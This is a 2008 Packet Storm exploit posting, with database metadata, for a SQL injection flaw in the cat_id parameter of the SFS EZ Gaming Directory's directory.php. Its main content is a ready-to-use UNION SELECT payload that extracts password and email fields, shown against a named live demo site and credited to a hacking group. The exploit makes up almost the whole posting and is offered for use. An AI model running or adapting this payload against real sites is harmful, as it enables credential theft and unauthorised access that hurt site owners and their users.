ID PACKETSTORM:71420
Type packetstorm
Reporter Hurley
Modified 2008-10-31T00:00:00
Description
`==================================================================================
SFS EZ Gaming Directory (directory.php id) Remote SQL Injection Vulnerability
==================================================================================
__ __ __
/ / / /_ _______/ /__ __ __
/ /_/ / / / / ___/ / _ \/ / / /
/ __ / /_/ / / / / __/ /_/ /
/_/ /_/\__,_/_/ /_/\___/\__, /
/____/
==================================================================================
----------------------------------------------------------------------------------
Website script: http://www.scripts-for-sites.info/index.php
----------------------------------------------------------------------------------
Exploit: http://localHost/gaming/directory.php?ax=list&l=list_by&cat_id=[exploit]
----------------------------------------------------------------------------------
LiveDemo:
http://www.turnkeyzone.com/demos/gaming/directory.php?ax=list&l=list_by&cat_id=1/**/union/**/all/**/select/**/1,2,concat_ws(0x3a,password,email),4,5,6,7,8,9,10,11,12,13/**/from/**/links/*
----------------------------------------------------------------------------------
==================================================================================
Special Thx : Darckc0de
==================================================================================
`
{"hash": "cbfab6b99c5308f9ffb04cf0875f7145bba684c9cee580d1feaef8a02fdf5707", "sourceHref": "https://packetstormsecurity.com/files/download/71420/sfsezgaming-sql.txt", "title": "sfsezgaming-sql.txt", "id": "PACKETSTORM:71420", "published": "2008-10-31T00:00:00", "description": "", "modified": "2008-10-31T00:00:00", "sourceData": "`================================================================================== \nSFS EZ Gaming Directory (directory.php id) Remote SQL Injection Vulnerability \n================================================================================== \n__ __ __ \n/ / / /_ _______/ /__ __ __ \n/ /_/ / / / / ___/ / _ \\/ / / / \n/ __ / /_/ / / / / __/ /_/ / \n/_/ /_/\\__,_/_/ /_/\\___/\\__, / \n/____/ \n================================================================================== \n---------------------------------------------------------------------------------- \nWebsite script: http://www.scripts-for-sites.info/index.php \n---------------------------------------------------------------------------------- \nExploit: http://localHost/gaming/directory.php?ax=list&l=list_by&cat_id=[exploit] \n---------------------------------------------------------------------------------- \nLiveDemo: \nhttp://www.turnkeyzone.com/demos/gaming/directory.php?ax=list&l=list_by&cat_id=1/**/union/**/all/**/select/**/1,2,concat_ws(0x3a,password,email),4,5,6,7,8,9,10,11,12,13/**/from/**/links/* \n---------------------------------------------------------------------------------- \n================================================================================== \nSpecial Thx : Darckc0de \n================================================================================== \n \n \n`\n", "reporter": "Hurley", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "0445b7f04da071856e136e856cbb9af2"}, {"key": "modified", "hash": "8f370b65bbb7a81c6bf369c025de647a"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "8f370b65bbb7a81c6bf369c025de647a"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "a4861eaa59bc3172cff7dc76d0c1f913"}, {"key": "sourceData", "hash": "b2bfb247baea3044f530d63a8a40a97d"}, {"key": "sourceHref", "hash": "5c0eec773f6b0f89f6c5c8e560af6d56"}, {"key": "title", "hash": "429fb804025ca91cde7ba15233449849"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "cvss": {"vector": "NONE", "score": 0.0}, "references": [], "type": "packetstorm", "cvelist": [], "history": [], "bulletinFamily": "exploit", "objectVersion": "1.2", "edition": 1, "href": "https://packetstormsecurity.com/files/71420/sfsezgaming-sql.txt.html", "lastseen": "2016-11-03T10:26:29", "viewCount": 0, "enchantments": {"vulnersScore": 9.0}}
{"result": {}}